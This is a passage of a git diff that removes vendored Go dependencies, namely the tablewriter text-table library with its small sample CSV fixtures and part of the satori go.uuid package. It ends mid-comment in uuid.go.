-table.Render() -``` - -##### Output 6 -``` -+----------+--------------------------+-------+---------+ -| DATE | DESCRIPTION | CV2 | AMOUNT | -+----------+--------------------------+-------+---------+ -| 1/1/2014 | Domain name | 1234 | $10.98 | -+ +--------------------------+-------+---------+ -| | January Hosting | 2345 | $54.95 | -+----------+--------------------------+-------+---------+ -| 1/4/2014 | February Hosting | 3456 | $51.00 | -+ +--------------------------+-------+---------+ -| | February Extra Bandwidth | 4567 | $30.00 | -+----------+--------------------------+-------+---------+ -| TOTAL | $146 93 | -+----------+--------------------------+-------+---------+ -``` - -#### TODO -- ~~Import Directly from CSV~~ - `done` -- ~~Support for `SetFooter`~~ - `done` -- ~~Support for `SetBorder`~~ - `done` -- ~~Support table with uneven rows~~ - `done` -- Support custom alignment -- General Improvement & Optimisation -- `NewHTML` Parse table from HTML diff --git a/vendor/github.com/olekukonko/tablewriter/csv.go b/vendor/github.com/olekukonko/tablewriter/csv.go deleted file mode 100644 index 98878303..00000000 --- a/vendor/github.com/olekukonko/tablewriter/csv.go +++ /dev/null @@ -1,52 +0,0 @@ -// Copyright 2014 Oleku Konko All rights reserved. -// Use of this source code is governed by a MIT -// license that can be found in the LICENSE file. - -// This module is a Table Writer API for the Go Programming Language. -// The protocols were written in pure Go and works on windows and unix systems - -package tablewriter - -import ( - "encoding/csv" - "io" - "os" -) - -// Start A new table by importing from a CSV file -// Takes io.Writer and csv File name -func NewCSV(writer io.Writer, fileName string, hasHeader bool) (*Table, error) { - file, err := os.Open(fileName) - if err != nil { - return &Table{}, err - } - defer file.Close() - csvReader := csv.NewReader(file) - t, err := NewCSVReader(writer, csvReader, hasHeader) - return t, err -} - -// Start a New Table Writer with csv.Reader -// This enables customisation such as reader.Comma = ';' -// See http://golang.org/src/pkg/encoding/csv/reader.go?s=3213:3671#L94 -func NewCSVReader(writer io.Writer, csvReader *csv.Reader, hasHeader bool) (*Table, error) { - t := NewWriter(writer) - if hasHeader { - // Read the first row - headers, err := csvReader.Read() - if err != nil { - return &Table{}, err - } - t.SetHeader(headers) - } - for { - record, err := csvReader.Read() - if err == io.EOF { - break - } else if err != nil { - return &Table{}, err - } - t.Append(record) - } - return t, nil -} diff --git a/vendor/github.com/olekukonko/tablewriter/table.go b/vendor/github.com/olekukonko/tablewriter/table.go deleted file mode 100644 index 3314bfba..00000000 --- a/vendor/github.com/olekukonko/tablewriter/table.go +++ /dev/null @@ -1,662 +0,0 @@ -// Copyright 2014 Oleku Konko All rights reserved. -// Use of this source code is governed by a MIT -// license that can be found in the LICENSE file. - -// This module is a Table Writer API for the Go Programming Language. -// The protocols were written in pure Go and works on windows and unix systems - -// Create & Generate text based table -package tablewriter - -import ( - "bytes" - "fmt" - "io" - "regexp" - "strings" -) - -const ( - MAX_ROW_WIDTH = 30 -) - -const ( - CENTER = "+" - ROW = "-" - COLUMN = "|" - SPACE = " " - NEWLINE = "\n" -) - -const ( - ALIGN_DEFAULT = iota - ALIGN_CENTER - ALIGN_RIGHT - ALIGN_LEFT -) - -var ( - decimal = regexp.MustCompile(`^-*\d*\.?\d*$`) - percent = regexp.MustCompile(`^-*\d*\.?\d*$%$`) -) - -type Border struct { - Left bool - Right bool - Top bool - Bottom bool -} - -type Table struct { - out io.Writer - rows [][]string - lines [][][]string - cs map[int]int - rs map[int]int - headers []string - footers []string - autoFmt bool - autoWrap bool - mW int - pCenter string - pRow string - pColumn string - tColumn int - tRow int - hAlign int - fAlign int - align int - newLine string - rowLine bool - autoMergeCells bool - hdrLine bool - borders Border - colSize int -} - -// Start New Table -// Take io.Writer Directly -func NewWriter(writer io.Writer) *Table { - t := &Table{ - out: writer, - rows: [][]string{}, - lines: [][][]string{}, - cs: make(map[int]int), - rs: make(map[int]int), - headers: []string{}, - footers: []string{}, - autoFmt: true, - autoWrap: true, - mW: MAX_ROW_WIDTH, - pCenter: CENTER, - pRow: ROW, - pColumn: COLUMN, - tColumn: -1, - tRow: -1, - hAlign: ALIGN_DEFAULT, - fAlign: ALIGN_DEFAULT, - align: ALIGN_DEFAULT, - newLine: NEWLINE, - rowLine: false, - hdrLine: true, - borders: Border{Left: true, Right: true, Bottom: true, Top: true}, - colSize: -1} - return t -} - -// Render table output -func (t Table) Render() { - if t.borders.Top { - t.printLine(true) - } - t.printHeading() - if t.autoMergeCells { - t.printRowsMergeCells() - } else { - t.printRows() - } - - if !t.rowLine && t.borders.Bottom { - t.printLine(true) - } - t.printFooter() - -} - -// Set table header -func (t *Table) SetHeader(keys []string) { - t.colSize = len(keys) - for i, v := range keys { - t.parseDimension(v, i, -1) - t.headers = append(t.headers, v) - } -} - -// Set table Footer -func (t *Table) SetFooter(keys []string) { - //t.colSize = len(keys) - for i, v := range keys { - t.parseDimension(v, i, -1) - t.footers = append(t.footers, v) - } -} - -// Turn header autoformatting on/off. Default is on (true). -func (t *Table) SetAutoFormatHeaders(auto bool) { - t.autoFmt = auto -} - -// Turn automatic multiline text adjustment on/off. Default is on (true). -func (t *Table) SetAutoWrapText(auto bool) { - t.autoWrap = auto -} - -// Set the Default column width -func (t *Table) SetColWidth(width int) { - t.mW = width -} - -// Set the Column Separator -func (t *Table) SetColumnSeparator(sep string) { - t.pColumn = sep -} - -// Set the Row Separator -func (t *Table) SetRowSeparator(sep string) { - t.pRow = sep -} - -// Set the center Separator -func (t *Table) SetCenterSeparator(sep string) { - t.pCenter = sep -} - -// Set Header Alignment -func (t *Table) SetHeaderAlignment(hAlign int) { - t.hAlign = hAlign -} - -// Set Footer Alignment -func (t *Table) SetFooterAlignment(fAlign int) { - t.fAlign = fAlign -} - -// Set Table Alignment -func (t *Table) SetAlignment(align int) { - t.align = align -} - -// Set New Line -func (t *Table) SetNewLine(nl string) { - t.newLine = nl -} - -// Set Header Line -// This would enable / disable a line after the header -func (t *Table) SetHeaderLine(line bool) { - t.hdrLine = line -} - -// Set Row Line -// This would enable / disable a line on each row of the table -func (t *Table) SetRowLine(line bool) { - t.rowLine = line -} - -// Set Auto Merge Cells -// This would enable / disable the merge of cells with identical values -func (t *Table) SetAutoMergeCells(auto bool) { - t.autoMergeCells = auto -} - -// Set Table Border -// This would enable / disable line around the table -func (t *Table) SetBorder(border bool) { - t.SetBorders(Border{border, border, border, border}) -} - -func (t *Table) SetBorders(border Border) { - t.borders = border -} - -// Append row to table -func (t *Table) Append(row []string) { - rowSize := len(t.headers) - if rowSize > t.colSize { - t.colSize = rowSize - } - - n := len(t.lines) - line := [][]string{} - for i, v := range row { - - // Detect string width - // Detect String height - // Break strings into words - out := t.parseDimension(v, i, n) - - // Append broken words - line = append(line, out) - } - t.lines = append(t.lines, line) -} - -// Allow Support for Bulk Append -// Eliminates repeated for loops -func (t *Table) AppendBulk(rows [][]string) { - for _, row := range rows { - t.Append(row) - } -} - -// Print line based on row width -func (t Table) printLine(nl bool) { - fmt.Fprint(t.out, t.pCenter) - for i := 0; i < len(t.cs); i++ { - v := t.cs[i] - fmt.Fprintf(t.out, "%s%s%s%s", - t.pRow, - strings.Repeat(string(t.pRow), v), - t.pRow, - t.pCenter) - } - if nl { - fmt.Fprint(t.out, t.newLine) - } -} - -// Print line based on row width with our without cell separator -func (t Table) printLineOptionalCellSeparators(nl bool, displayCellSeparator []bool) { - fmt.Fprint(t.out, t.pCenter) - for i := 0; i < len(t.cs); i++ { - v := t.cs[i] - if i > len(displayCellSeparator) || displayCellSeparator[i] { - // Display the cell separator - fmt.Fprintf(t.out, "%s%s%s%s", - t.pRow, - strings.Repeat(string(t.pRow), v), - t.pRow, - t.pCenter) - } else { - // Don't display the cell separator for this cell - fmt.Fprintf(t.out, "%s%s", - strings.Repeat(" ", v+2), - t.pCenter) - } - } - if nl { - fmt.Fprint(t.out, t.newLine) - } -} - -// Return the PadRight function if align is left, PadLeft if align is right, -// and Pad by default -func pad(align int) func(string, string, int) string { - padFunc := Pad - switch align { - case ALIGN_LEFT: - padFunc = PadRight - case ALIGN_RIGHT: - padFunc = PadLeft - } - return padFunc -} - -// Print heading information -func (t Table) printHeading() { - // Check if headers is available - if len(t.headers) < 1 { - return - } - - // Check if border is set - // Replace with space if not set - fmt.Fprint(t.out, ConditionString(t.borders.Left, t.pColumn, SPACE)) - - // Identify last column - end := len(t.cs) - 1 - - // Get pad function - padFunc := pad(t.hAlign) - - // Print Heading column - for i := 0; i <= end; i++ { - v := t.cs[i] - h := t.headers[i] - if t.autoFmt { - h = Title(h) - } - pad := ConditionString((i == end && !t.borders.Left), SPACE, t.pColumn) - fmt.Fprintf(t.out, " %s %s", - padFunc(h, SPACE, v), - pad) - } - // Next line - fmt.Fprint(t.out, t.newLine) - if t.hdrLine { - t.printLine(true) - } -} - -// Print heading information -func (t Table) printFooter() { - // Check if headers is available - if len(t.footers) < 1 { - return - } - - // Only print line if border is not set - if !t.borders.Bottom { - t.printLine(true) - } - // Check if border is set - // Replace with space if not set - fmt.Fprint(t.out, ConditionString(t.borders.Bottom, t.pColumn, SPACE)) - - // Identify last column - end := len(t.cs) - 1 - - // Get pad function - padFunc := pad(t.fAlign) - - // Print Heading column - for i := 0; i <= end; i++ { - v := t.cs[i] - f := t.footers[i] - if t.autoFmt { - f = Title(f) - } - pad := ConditionString((i == end && !t.borders.Top), SPACE, t.pColumn) - - if len(t.footers[i]) == 0 { - pad = SPACE - } - fmt.Fprintf(t.out, " %s %s", - padFunc(f, SPACE, v), - pad) - } - // Next line - fmt.Fprint(t.out, t.newLine) - //t.printLine(true) - - hasPrinted := false - - for i := 0; i <= end; i++ { - v := t.cs[i] - pad := t.pRow - center := t.pCenter - length := len(t.footers[i]) - - if length > 0 { - hasPrinted = true - } - - // Set center to be space if length is 0 - if length == 0 && !t.borders.Right { - center = SPACE - } - - // Print first junction - if i == 0 { - fmt.Fprint(t.out, center) - } - - // Pad With space of length is 0 - if length == 0 { - pad = SPACE - } - // Ignore left space of it has printed before - if hasPrinted || t.borders.Left { - pad = t.pRow - center = t.pCenter - } - - // Change Center start position - if center == SPACE { - if i < end && len(t.footers[i+1]) != 0 { - center = t.pCenter - } - } - - // Print the footer - fmt.Fprintf(t.out, "%s%s%s%s", - pad, - strings.Repeat(string(pad), v), - pad, - center) - - } - - fmt.Fprint(t.out, t.newLine) - -} - -func (t Table) printRows() { - for i, lines := range t.lines { - t.printRow(lines, i) - } - -} - -// Print Row Information -// Adjust column alignment based on type - -func (t Table) printRow(columns [][]string, colKey int) { - // Get Maximum Height - max := t.rs[colKey] - total := len(columns) - - // TODO Fix uneven col size - // if total < t.colSize { - // for n := t.colSize - total; n < t.colSize ; n++ { - // columns = append(columns, []string{SPACE}) - // t.cs[n] = t.mW - // } - //} - - // Pad Each Height - // pads := []int{} - pads := []int{} - - for i, line := range columns { - length := len(line) - pad := max - length - pads = append(pads, pad) - for n := 0; n < pad; n++ { - columns[i] = append(columns[i], " ") - } - } - //fmt.Println(max, "\n") - for x := 0; x < max; x++ { - for y := 0; y < total; y++ { - - // Check if border is set - fmt.Fprint(t.out, ConditionString((!t.borders.Left && y == 0), SPACE, t.pColumn)) - - fmt.Fprintf(t.out, SPACE) - str := columns[y][x] - - // This would print alignment - // Default alignment would use multiple configuration - switch t.align { - case ALIGN_CENTER: // - fmt.Fprintf(t.out, "%s", Pad(str, SPACE, t.cs[y])) - case ALIGN_RIGHT: - fmt.Fprintf(t.out, "%s", PadLeft(str, SPACE, t.cs[y])) - case ALIGN_LEFT: - fmt.Fprintf(t.out, "%s", PadRight(str, SPACE, t.cs[y])) - default: - if decimal.MatchString(strings.TrimSpace(str)) || percent.MatchString(strings.TrimSpace(str)) { - fmt.Fprintf(t.out, "%s", PadLeft(str, SPACE, t.cs[y])) - } else { - fmt.Fprintf(t.out, "%s", PadRight(str, SPACE, t.cs[y])) - - // TODO Custom alignment per column - //if max == 1 || pads[y] > 0 { - // fmt.Fprintf(t.out, "%s", Pad(str, SPACE, t.cs[y])) - //} else { - // fmt.Fprintf(t.out, "%s", PadRight(str, SPACE, t.cs[y])) - //} - - } - } - fmt.Fprintf(t.out, SPACE) - } - // Check if border is set - // Replace with space if not set - fmt.Fprint(t.out, ConditionString(t.borders.Left, t.pColumn, SPACE)) - fmt.Fprint(t.out, t.newLine) - } - - if t.rowLine { - t.printLine(true) - } -} - -// Print the rows of the table and merge the cells that are identical -func (t Table) printRowsMergeCells() { - var previousLine []string - var displayCellBorder []bool - var tmpWriter bytes.Buffer - for i, lines := range t.lines { - // We store the display of the current line in a tmp writer, as we need to know which border needs to be print above - previousLine, displayCellBorder = t.printRowMergeCells(&tmpWriter, lines, i, previousLine) - if i > 0 { //We don't need to print borders above first line - if t.rowLine { - t.printLineOptionalCellSeparators(true, displayCellBorder) - } - } - tmpWriter.WriteTo(t.out) - } - //Print the end of the table - if t.rowLine { - t.printLine(true) - } -} - -// Print Row Information to a writer and merge identical cells. -// Adjust column alignment based on type - -func (t Table) printRowMergeCells(writer io.Writer, columns [][]string, colKey int, previousLine []string) ([]string, []bool) { - // Get Maximum Height - max := t.rs[colKey] - total := len(columns) - - // Pad Each Height - pads := []int{} - - for i, line := range columns { - length := len(line) - pad := max - length - pads = append(pads, pad) - for n := 0; n < pad; n++ { - columns[i] = append(columns[i], " ") - } - } - - var displayCellBorder []bool - for x := 0; x < max; x++ { - for y := 0; y < total; y++ { - - // Check if border is set - fmt.Fprint(writer, ConditionString((!t.borders.Left && y == 0), SPACE, t.pColumn)) - - fmt.Fprintf(writer, SPACE) - - str := columns[y][x] - - if t.autoMergeCells { - //Store the full line to merge mutli-lines cells - fullLine := strings.Join(columns[y], " ") - if len(previousLine) > y && fullLine == previousLine[y] && fullLine != "" { - // If this cell is identical to the one above but not empty, we don't display the border and keep the cell empty. - displayCellBorder = append(displayCellBorder, false) - str = "" - } else { - // First line or different content, keep the content and print the cell border - displayCellBorder = append(displayCellBorder, true) - } - } - - // This would print alignment - // Default alignment would use multiple configuration - switch t.align { - case ALIGN_CENTER: // - fmt.Fprintf(writer, "%s", Pad(str, SPACE, t.cs[y])) - case ALIGN_RIGHT: - fmt.Fprintf(writer, "%s", PadLeft(str, SPACE, t.cs[y])) - case ALIGN_LEFT: - fmt.Fprintf(writer, "%s", PadRight(str, SPACE, t.cs[y])) - default: - if decimal.MatchString(strings.TrimSpace(str)) || percent.MatchString(strings.TrimSpace(str)) { - fmt.Fprintf(writer, "%s", PadLeft(str, SPACE, t.cs[y])) - } else { - fmt.Fprintf(writer, "%s", PadRight(str, SPACE, t.cs[y])) - } - } - fmt.Fprintf(writer, SPACE) - } - // Check if border is set - // Replace with space if not set - fmt.Fprint(writer, ConditionString(t.borders.Left, t.pColumn, SPACE)) - fmt.Fprint(writer, t.newLine) - } - - //The new previous line is the current one - previousLine = make([]string, total) - for y := 0; y < total; y++ { - previousLine[y] = strings.Join(columns[y], " ") //Store the full line for multi-lines cells - } - //Returns the newly added line and wether or not a border should be displayed above. - return previousLine, displayCellBorder -} - -func (t *Table) parseDimension(str string, colKey, rowKey int) []string { - var ( - raw []string - max int - ) - w := DisplayWidth(str) - // Calculate Width - // Check if with is grater than maximum width - if w > t.mW { - w = t.mW - } - - // Check if width exists - v, ok := t.cs[colKey] - if !ok || v < w || v == 0 { - t.cs[colKey] = w - } - - if rowKey == -1 { - return raw - } - // Calculate Height - if t.autoWrap { - raw, _ = WrapString(str, t.cs[colKey]) - } else { - raw = getLines(str) - } - - for _, line := range raw { - if w := DisplayWidth(line); w > max { - max = w - } - } - - // Make sure the with is the same length as maximum word - // Important for cases where the width is smaller than maxu word - if max > t.cs[colKey] { - t.cs[colKey] = max - } - - h := len(raw) - v, ok = t.rs[rowKey] - - if !ok || v < h || v == 0 { - t.rs[rowKey] = h - } - //fmt.Printf("Raw %+v %d\n", raw, len(raw)) - return raw -} diff --git a/vendor/github.com/olekukonko/tablewriter/test.csv b/vendor/github.com/olekukonko/tablewriter/test.csv deleted file mode 100644 index 1609327e..00000000 --- a/vendor/github.com/olekukonko/tablewriter/test.csv +++ /dev/null @@ -1,4 +0,0 @@ -first_name,last_name,ssn -John,Barry,123456 -Kathy,Smith,687987 -Bob,McCornick,3979870 \ No newline at end of file diff --git a/vendor/github.com/olekukonko/tablewriter/test_info.csv b/vendor/github.com/olekukonko/tablewriter/test_info.csv deleted file mode 100644 index e4c40e98..00000000 --- a/vendor/github.com/olekukonko/tablewriter/test_info.csv +++ /dev/null @@ -1,4 +0,0 @@ -Field,Type,Null,Key,Default,Extra -user_id,smallint(5),NO,PRI,NULL,auto_increment -username,varchar(10),NO,,NULL, -password,varchar(100),NO,,NULL, \ No newline at end of file diff --git a/vendor/github.com/olekukonko/tablewriter/util.go b/vendor/github.com/olekukonko/tablewriter/util.go deleted file mode 100644 index 2deefbc5..00000000 --- a/vendor/github.com/olekukonko/tablewriter/util.go +++ /dev/null @@ -1,72 +0,0 @@ -// Copyright 2014 Oleku Konko All rights reserved. -// Use of this source code is governed by a MIT -// license that can be found in the LICENSE file. - -// This module is a Table Writer API for the Go Programming Language. -// The protocols were written in pure Go and works on windows and unix systems - -package tablewriter - -import ( - "math" - "regexp" - "strings" - - "github.com/mattn/go-runewidth" -) - -var ansi = regexp.MustCompile("\033\\[(?:[0-9]{1,3}(?:;[0-9]{1,3})*)?[m|K]") - -func DisplayWidth(str string) int { - return runewidth.StringWidth(ansi.ReplaceAllLiteralString(str, "")) -} - -// Simple Condition for string -// Returns value based on condition -func ConditionString(cond bool, valid, inValid string) string { - if cond { - return valid - } - return inValid -} - -// Format Table Header -// Replace _ , . and spaces -func Title(name string) string { - name = strings.Replace(name, "_", " ", -1) - name = strings.Replace(name, ".", " ", -1) - name = strings.TrimSpace(name) - return strings.ToUpper(name) -} - -// Pad String -// Attempts to play string in the center -func Pad(s, pad string, width int) string { - gap := width - DisplayWidth(s) - if gap > 0 { - gapLeft := int(math.Ceil(float64(gap / 2))) - gapRight := gap - gapLeft - return strings.Repeat(string(pad), gapLeft) + s + strings.Repeat(string(pad), gapRight) - } - return s -} - -// Pad String Right position -// This would pace string at the left side fo the screen -func PadRight(s, pad string, width int) string { - gap := width - DisplayWidth(s) - if gap > 0 { - return s + strings.Repeat(string(pad), gap) - } - return s -} - -// Pad String Left position -// This would pace string at the right side fo the screen -func PadLeft(s, pad string, width int) string { - gap := width - DisplayWidth(s) - if gap > 0 { - return strings.Repeat(string(pad), gap) + s - } - return s -} diff --git a/vendor/github.com/olekukonko/tablewriter/wrap.go b/vendor/github.com/olekukonko/tablewriter/wrap.go deleted file mode 100644 index 5290fb65..00000000 --- a/vendor/github.com/olekukonko/tablewriter/wrap.go +++ /dev/null @@ -1,103 +0,0 @@ -// Copyright 2014 Oleku Konko All rights reserved. -// Use of this source code is governed by a MIT -// license that can be found in the LICENSE file. - -// This module is a Table Writer API for the Go Programming Language. -// The protocols were written in pure Go and works on windows and unix systems - -package tablewriter - -import ( - "math" - "strings" - "unicode/utf8" -) - -var ( - nl = "\n" - sp = " " -) - -const defaultPenalty = 1e5 - -// Wrap wraps s into a paragraph of lines of length lim, with minimal -// raggedness. -func WrapString(s string, lim int) ([]string, int) { - words := strings.Split(strings.Replace(s, nl, sp, -1), sp) - var lines []string - max := 0 - for _, v := range words { - max = len(v) - if max > lim { - lim = max - } - } - for _, line := range WrapWords(words, 1, lim, defaultPenalty) { - lines = append(lines, strings.Join(line, sp)) - } - return lines, lim -} - -// WrapWords is the low-level line-breaking algorithm, useful if you need more -// control over the details of the text wrapping process. For most uses, -// WrapString will be sufficient and more convenient. -// -// WrapWords splits a list of words into lines with minimal "raggedness", -// treating each rune as one unit, accounting for spc units between adjacent -// words on each line, and attempting to limit lines to lim units. Raggedness -// is the total error over all lines, where error is the square of the -// difference of the length of the line and lim. Too-long lines (which only -// happen when a single word is longer than lim units) have pen penalty units -// added to the error. -func WrapWords(words []string, spc, lim, pen int) [][]string { - n := len(words) - - length := make([][]int, n) - for i := 0; i < n; i++ { - length[i] = make([]int, n) - length[i][i] = utf8.RuneCountInString(words[i]) - for j := i + 1; j < n; j++ { - length[i][j] = length[i][j-1] + spc + utf8.RuneCountInString(words[j]) - } - } - nbrk := make([]int, n) - cost := make([]int, n) - for i := range cost { - cost[i] = math.MaxInt32 - } - for i := n - 1; i >= 0; i-- { - if length[i][n-1] <= lim { - cost[i] = 0 - nbrk[i] = n - } else { - for j := i + 1; j < n; j++ { - d := lim - length[i][j-1] - c := d*d + cost[j] - if length[i][j-1] > lim { - c += pen // too-long lines get a worse penalty - } - if c < cost[i] { - cost[i] = c - nbrk[i] = j - } - } - } - } - var lines [][]string - i := 0 - for i < n { - lines = append(lines, words[i:nbrk[i]]) - i = nbrk[i] - } - return lines -} - -// getLines decomposes a multiline string into a slice of strings. -func getLines(s string) []string { - var lines []string - - for _, line := range strings.Split(s, nl) { - lines = append(lines, line) - } - return lines -} diff --git a/vendor/github.com/satori/go.uuid/LICENSE b/vendor/github.com/satori/go.uuid/LICENSE deleted file mode 100644 index 488357b8..00000000 --- a/vendor/github.com/satori/go.uuid/LICENSE +++ /dev/null @@ -1,20 +0,0 @@ -Copyright (C) 2013-2016 by Maxim Bublis - -Permission is hereby granted, free of charge, to any person obtaining -a copy of this software and associated documentation files (the -"Software"), to deal in the Software without restriction, including -without limitation the rights to use, copy, modify, merge, publish, -distribute, sublicense, and/or sell copies of the Software, and to -permit persons to whom the Software is furnished to do so, subject to -the following conditions: - -The above copyright notice and this permission notice shall be -included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, -EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF -MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND -NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE -LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION -OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION -WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/vendor/github.com/satori/go.uuid/README.md b/vendor/github.com/satori/go.uuid/README.md deleted file mode 100644 index b6aad1c8..00000000 --- a/vendor/github.com/satori/go.uuid/README.md +++ /dev/null @@ -1,65 +0,0 @@ -# UUID package for Go language - -[![Build Status](https://travis-ci.org/satori/go.uuid.png?branch=master)](https://travis-ci.org/satori/go.uuid) -[![Coverage Status](https://coveralls.io/repos/github/satori/go.uuid/badge.svg?branch=master)](https://coveralls.io/github/satori/go.uuid) -[![GoDoc](http://godoc.org/github.com/satori/go.uuid?status.png)](http://godoc.org/github.com/satori/go.uuid) - -This package provides pure Go implementation of Universally Unique Identifier (UUID). Supported both creation and parsing of UUIDs. - -With 100% test coverage and benchmarks out of box. - -Supported versions: -* Version 1, based on timestamp and MAC address (RFC 4122) -* Version 2, based on timestamp, MAC address and POSIX UID/GID (DCE 1.1) -* Version 3, based on MD5 hashing (RFC 4122) -* Version 4, based on random numbers (RFC 4122) -* Version 5, based on SHA-1 hashing (RFC 4122) - -## Installation - -Use the `go` command: - - $ go get github.com/satori/go.uuid - -## Requirements - -UUID package requires Go >= 1.2. - -## Example - -```go -package main - -import ( - "fmt" - "github.com/satori/go.uuid" -) - -func main() { - // Creating UUID Version 4 - u1 := uuid.NewV4() - fmt.Printf("UUIDv4: %s\n", u1) - - // Parsing UUID from string input - u2, err := uuid.FromString("6ba7b810-9dad-11d1-80b4-00c04fd430c8") - if err != nil { - fmt.Printf("Something gone wrong: %s", err) - } - fmt.Printf("Successfully parsed: %s", u2) -} -``` - -## Documentation - -[Documentation](http://godoc.org/github.com/satori/go.uuid) is hosted at GoDoc project. - -## Links -* [RFC 4122](http://tools.ietf.org/html/rfc4122) -* [DCE 1.1: Authentication and Security Services](http://pubs.opengroup.org/onlinepubs/9696989899/chap5.htm#tagcjh_08_02_01_01) - -## Copyright - -Copyright (C) 2013-2016 by Maxim Bublis . - -UUID package released under MIT License. -See [LICENSE](https://github.com/satori/go.uuid/blob/master/LICENSE) for details. diff --git a/vendor/github.com/satori/go.uuid/uuid.go b/vendor/github.com/satori/go.uuid/uuid.go deleted file mode 100644 index 295f3fc2..00000000 --- a/vendor/github.com/satori/go.uuid/uuid.go +++ /dev/null @@ -1,481 +0,0 @@ -// Copyright (C) 2013-2015 by Maxim Bublis -// -// Permission is hereby granted, free of charge, to any person obtaining -// a copy of this software and associated documentation files (the -// "Software"), to deal in the Software without restriction, including -// without limitation the rights to use, copy, modify, merge, publish, -// distribute, sublicense, and/or sell copies of the Software, and to -// permit persons to whom the Software is furnished to do so, subject to -// the following conditions: -// -// The above copyright notice and this permission notice shall be -// included in all copies or substantial portions of the Software. -// -// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, -// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF -// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND -// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE -// LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION -// OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION -// WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - -// Package uuid provides implementation of Universally Unique Identifier (UUID). -// Supported versions are 1, 3, 4 and 5 (as specified in RFC 4122) and -// version 2 (as specified in DCE 1.1). -package uuid - -import ( - "bytes" - "crypto/md5" - "crypto/rand" - "crypto/sha1" - "database/sql/driver" - "encoding/binary" - "encoding/hex" - "fmt" - "hash" - "net" - "os" - "sync" - "time" -) - -// UUID layout variants. -const ( - VariantNCS = iota - VariantRFC4122 - VariantMicrosoft - VariantFuture -) - -// UUID DCE domains. -const ( - DomainPerson = iota - DomainGroup - DomainOrg -) - -// Difference in 100-nanosecond intervals between -// UUID epoch (October 15, 1582) and Unix epoch (January 1, 1970). -const epochStart = 122192928000000000 - -// Used in string method conversion -const dash byte = '-' - -// UUID v1/v2 storage. -var ( - storageMutex sync.Mutex - storageOnce sync.Once - epochFunc = unixTimeFunc - clockSequence uint16 - lastTime uint64 - hardwareAddr [6]byte - posixUID = uint32(os.Getuid()) - posixGID = uint32(os.Getgid()) -) - -// String parse helpers. -var ( - urnPrefix = []byte("urn:uuid:") - byteGroups = []int{8, 4, 4, 4, 12} -) - -func initClockSequence() { - buf := make([]byte, 2) - safeRandom(buf) - clockSequence = binary.BigEndian.Uint16(buf) -} - -func initHardwareAddr() { - interfaces, err := net.Interfaces() - if err == nil { - for _, iface := range interfaces { - if len(iface.HardwareAddr) >= 6 { - copy(hardwareAddr[:], iface.HardwareAddr) - return - } - } - } - - // Initialize hardwareAddr randomly in case - // of real network interfaces absence - safeRandom(hardwareAddr[:]) - - // Set multicast bit as recommended in RFC 4122 - hardwareAddr[0] |= 0x01 -} - -func initStorage() { - initClockSequence() - initHardwareAddr() -} - -func safeRandom(dest []byte) { - if _, err := rand.Read(dest); err != nil { - panic(err) - } -} - -// Returns difference in 100-nanosecond intervals between -// UUID epoch (October 15, 1582) and current time. -// This is default epoch calculation function. -func unixTimeFunc() uint64 { - return epochStart + uint64(time.Now().UnixNano()/100) -} - -// UUID representation compliant with specification -// described in RFC 4122. -type UUID [16]byte - -// NullUUID can be used with the standard sql package to represent a -// UUID value that can be NULL in the database -type NullUUID struct { - UUID UUID - Valid bool -} - -// The nil UUID is special form of UUID that is specified to have all -// 128 bits set to zero. -var Nil = UUID{} - -// Predefined namespace UUIDs. -var ( - NamespaceDNS, _ = FromString("6ba7b810-9dad-11d1-80b4-00c04fd430c8") - NamespaceURL, _ = FromString("6ba7b811-9dad-11d1-80b4-00c04fd430c8") - NamespaceOID, _ = FromString("6ba7b812-9dad-11d1-80b4-00c04fd430c8") - NamespaceX500, _ = FromString("6ba7b814-9dad-11d1-80b4-00c04fd430c8") -) - -// And returns result of binary AND of two UUIDs. -func And(u1 UUID, u2 UUID) UUID { - u := UUID{} - for i := 0; i < 16; i++ { - u[i] = u1[i] & u2[i] - } - return u -} - -// Or returns result of binary OR of two UUIDs. -func Or(u1 UUID, u2 UUID) UUID { - u := UUID{} - for i := 0; i < 16; i++ { - u[i] = u1[i] | u2[i] - } - return u -} - -// Equal returns true if u1 and u2 equals, otherwise returns false. -func Equal(u1 UUID, u2 UUID) bool { - return bytes.Equal(u1[:], u2[:]) -} - -// Version returns algorithm version used to generate UUID. -func (u UUID) Version() uint { - return uint(u[6] >> 4) -} - -// Variant returns UUID layout variant. -func (u UUID) Variant() uint { - switch { - case (u[8] & 0x80) == 0x00: - return VariantNCS - case (u[8]&0xc0)|0x80 == 0x80: - return VariantRFC4122 - case (u[8]&0xe0)|0xc0 == 0xc0: - return VariantMicrosoft - } - return VariantFuture -} - -// Bytes returns bytes slice representation of UUID. -func (u UUID) Bytes() []byte { - return u[:] -} - -// Returns canonical string representation of UUID: -// xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx. -func (u UUID) String() string { - buf := make([]byte, 36) - - hex.Encode(buf[0:8], u[0:4]) - buf[8] = dash - hex.Encode(buf[9:13], u[4:6]) - buf[13] = dash - hex.Encode(buf[14:18], u[6:8]) - buf[18] = dash - hex.Encode(buf[19:23], u[8:10]) - buf[23] = dash - hex.Encode(buf[24:], u[10:]) - - return string(buf) -} - -// SetVersion sets version bits. -func (u *UUID) SetVersion(v byte) { - u[6] = (u[6] & 0x0f) | (v << 4) -} - -// SetVariant sets variant bits as described in RFC 4122. -func (u *UUID) SetVariant() { - u[8] = (u[8] & 0xbf) | 0x80 -} - -// MarshalText implements the encoding.TextMarshaler interface. -// The encoding is 